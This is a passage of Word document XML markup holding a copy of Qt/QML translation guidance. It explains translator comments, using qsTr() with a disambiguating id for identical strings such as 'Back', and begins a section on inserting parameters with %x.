          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">line is optional extra information. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first word of the text is used as an additional identifier in the XML element</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the .ts file so </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>make sure</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first word is not part of the sentence. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the comment "Context Not related to that" is converted to "&lt;extra-Context&gt;Not related to that" in the .ts file.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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id</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 xml:space="preserve"> txt1</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This user interface string is only used here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//: The back of the object, not the front</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//~ Context Not related to back-stepping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    text</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Back"</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="004A2B67">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1119" w:name="3-disambiguate-identical-texts"/>
      <w:bookmarkStart w:id="1120" w:name="_Toc483000768"/>
      <w:bookmarkStart w:id="1121" w:name="_Toc483003766"/>
      <w:bookmarkStart w:id="1122" w:name="_Toc483604120"/>
      <w:bookmarkStart w:id="1123" w:name="_Toc483605340"/>
      <w:bookmarkEnd w:id="1119"/>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Disambiguate Identical Texts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1120"/>
      <w:bookmarkEnd w:id="1121"/>
      <w:bookmarkEnd w:id="1122"/>
      <w:bookmarkEnd w:id="1123"/>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>translation system consolidates the user interface text strings into unique items</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This consolidation </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>saves the person doing the translation work having to translate the same text multiple times</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, in some cases, the text is identical but has a different meaning. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in English, "back" means take a step backward and also means the part of an object opposite to the front. You need to tell the translation system about these two separate meanings so the translator can create two separate translations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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Differentiate between identical texts by adding some </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id text as the second parameter of the qsTr() function</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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5211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In the following code snippet, the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not front</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text is an id to differentiate this "Back" text from the backstepping "Back" text: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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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id</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 xml:space="preserve"> txt1</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// This user interface string is used only here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//: The back of the object, not the front</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67"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4A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//~ Context Not related to back-stepping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    text</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Back"</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"not front"</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="004A2B67">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1124" w:name="4-use-op-op-x-to-insert-parameters-into-"/>
      <w:bookmarkStart w:id="1125" w:name="_Toc483000769"/>
      <w:bookmarkStart w:id="1126" w:name="_Toc483003767"/>
      <w:bookmarkStart w:id="1127" w:name="_Toc483604121"/>
      <w:bookmarkStart w:id="1128" w:name="_Toc483605341"/>
      <w:bookmarkEnd w:id="1124"/>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Use</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to Insert Parameters into a String</w:t>
